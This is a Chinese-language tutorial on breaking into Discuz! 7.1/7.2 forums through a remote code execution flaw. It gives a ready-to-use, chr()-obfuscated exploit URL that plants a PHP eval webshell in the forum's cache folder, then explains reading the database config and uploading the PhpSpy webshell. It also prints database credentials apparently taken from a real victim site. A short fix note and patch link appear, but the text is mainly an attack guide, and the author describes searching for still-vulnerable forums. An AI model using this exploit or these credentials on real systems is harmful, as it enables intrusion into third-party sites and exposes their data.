Discuz 7.2漏洞入侵圖解

Discuz 7.2漏洞入侵圖解

找到一個論壇,註冊一個賬號

註冊好後,使用exp

複製以下代碼:

http://此處爲論壇地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}

以上爲exp

如若此處爲空白,說明成功

存在該文件

php一句話連接forumdata/cache/usergroup_01.php

讀取數據庫連接文件

在模塊中選擇讀取文件,並輸入數據庫連接文件的地址“****/dc/config.inc.php”,如圖8所示,成功獲取該論壇數據庫的敏感信息:
$dbhost = 'localhost'; // 數據庫服務器
$dbuser = 'skycheer'; // 數據庫用戶名
$dbpw = 'sky0127'; // 數據庫密碼
$dbname = 'skycheer'; // 數據庫名
$pconnect = 0;

上傳大馬

使用一句話管理實在是不方便,在功能模塊中選擇上傳文件,使用空的路徑直接將本地的大馬上傳到一句話木馬所在的路徑,上傳成功後直接訪問,如圖9所示,成功得到我們熟悉的PhpSpy ver 2008界面。至此已經獲取Discuz!7.2版本的Webshell,大家都知道Discuz!論壇的Webshell很難拿到,因此本漏洞的珍稀程度可想而知。

Discuz!7.1&7.2遠程溢出漏洞出來後,國內有關Discuz!的大中小論壇基本沒有什麼倖免,安全做的好的去掉了cache的執行權限,將其權限設置爲無,逃過劫難。

友情提示:非法入侵他人站點,一切後果自負 上文出自77169 /techweb

利用:註冊後登陸 misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} 任意執行。

DZ 7.1、7.2 針對getshell的修復方法:
在common.inc.php上面加上$response=$scriptlang=array(); 

這個洞t00ls團隊發現的,DZ官方已經被人日過了。

官方補丁:http://www.discuz.net/thread-1537673-1-1.html

=============================================================================

截止到今天有這個洞的Dz論壇已經很少了,我剛纔在谷歌翻了幾篇,只找到一個有洞的,

其他的都補上了,可惜的是這個有洞的論壇用一句話連接後居然不顯示文件路徑,真是杯具!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章